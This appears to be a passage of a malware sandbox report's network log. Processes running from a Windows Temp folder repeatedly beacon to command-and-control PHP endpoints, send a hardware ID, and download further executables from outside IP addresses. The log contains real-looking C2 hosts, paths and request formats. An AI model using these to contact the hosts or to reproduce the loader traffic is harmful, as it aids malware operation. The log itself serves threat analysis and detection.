                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.16
                                                      Content-Length: 31
                                                      Cache-Control: no-cache
                                                      Data Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                      Data Ascii: d1=1000002001&unit=246122658369


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      32192.168.2.749764185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:12.783968925 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                                      Sep 24, 2024 15:35:13.491669893 CEST196INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:35:13 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 7 <c><d>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      33192.168.2.749765185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:15.132203102 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      34192.168.2.749766185.215.113.16807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:16.280670881 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.16
                                                      Content-Length: 31
                                                      Cache-Control: no-cache
                                                      Data Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                      Data Ascii: d1=1000002001&unit=246122658369


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      35192.168.2.749767185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:16.663682938 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      36192.168.2.749769185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:18.318351030 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      37192.168.2.749771185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:19.903234959 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      38192.168.2.749777194.116.215.195807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:21.304107904 CEST51OUTGET /12dsvc.exe HTTP/1.1
                                                      Host: 194.116.215.195


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      39192.168.2.749779185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:21.582997084 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      40192.168.2.749781185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:23.409583092 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      41192.168.2.749788185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:25.100182056 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      42192.168.2.749789194.116.215.195807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:26.336025000 CEST51OUTGET /12dsvc.exe HTTP/1.1
                                                      Host: 194.116.215.195


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      43192.168.2.749790185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:26.630788088 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      44192.168.2.749792185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:29.401340961 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      45192.168.2.749793185.215.113.37808032C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:30.319031000 CEST89OUTGET / HTTP/1.1
                                                      Host: 185.215.113.37
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Sep 24, 2024 15:35:31.031548023 CEST203INHTTP/1.1 200 OK
                                                      Date: Tue, 24 Sep 2024 13:35:30 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Content-Length: 0
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Sep 24, 2024 15:35:31.036463022 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=----DHJKJKKKJJJKJKFHJJJJ
                                                      Host: 185.215.113.37
                                                      Content-Length: 211
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Data Raw: 2d 2d 2d 2d 2d 2d 44 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 46 46 41 44 43 38 32 43 41 34 35 31 33 38 38 39 34 31 30 35 33 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 2d 2d 0d 0a
                                                      Data Ascii: ------DHJKJKKKJJJKJKFHJJJJContent-Disposition: form-data; name="hwid"FFFADC82CA451388941053------DHJKJKKKJJJKJKFHJJJJContent-Disposition: form-data; name="build"save------DHJKJKKKJJJKJKFHJJJJ--
                                                      Sep 24, 2024 15:35:31.260447979 CEST210INHTTP/1.1 200 OK
                                                      Date: Tue, 24 Sep 2024 13:35:31 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Content-Length: 8
                                                      Keep-Alive: timeout=5, max=99
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 59 6d 78 76 59 32 73 3d
                                                      Data Ascii: YmxvY2s=


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      46192.168.2.749794185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:31.004658937 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      47192.168.2.749795194.116.215.195807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:31.379682064 CEST51OUTGET /12dsvc.exe HTTP/1.1
                                                      Host: 194.116.215.195


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      48192.168.2.749797185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:32.959295034 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      49192.168.2.749798185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:34.509012938 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      50192.168.2.749799185.215.113.37807812C:\Users\user\1000015002\b74664dd7e.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:35.545645952 CEST89OUTGET / HTTP/1.1
                                                      Host: 185.215.113.37
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      51192.168.2.749800185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:36.293226957 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      52192.168.2.749801185.215.113.16807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:36.419630051 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.16
                                                      Content-Length: 31
                                                      Cache-Control: no-cache
                                                      Data Raw: 65 30 3d 31 30 30 30 30 30 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                      Data Ascii: e0=1000004001&unit=246122658369
                                                      Sep 24, 2024 15:35:37.136255980 CEST193INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:35:37 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 4 <c>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      53192.168.2.749802185.215.113.26807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:37.150342941 CEST50OUTGET /Nework.exe HTTP/1.1
                                                      Host: 185.215.113.26


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      54192.168.2.749803185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:37.817887068 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      55192.168.2.749805185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:39.460530043 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      56192.168.2.749806185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:41.014313936 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                                      Sep 24, 2024 15:35:41.708657026 CEST196INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:35:41 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 7 <c><d>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      57192.168.2.749807185.215.113.26807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:42.178565025 CEST50OUTGET /Nework.exe HTTP/1.1
                                                      Host: 185.215.113.26


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      58192.168.2.749809185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:44.183165073 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      59192.168.2.749811185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:45.709686995 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                                      Sep 24, 2024 15:35:46.431653976 CEST196INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:35:46 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 7 <c><d>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      60192.168.2.749812185.215.113.26807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:47.245260954 CEST50OUTGET /Nework.exe HTTP/1.1
                                                      Host: 185.215.113.26


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      61192.168.2.749814185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:48.154081106 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      62192.168.2.749815185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:49.681114912 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      63192.168.2.749816185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:51.394382000 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s


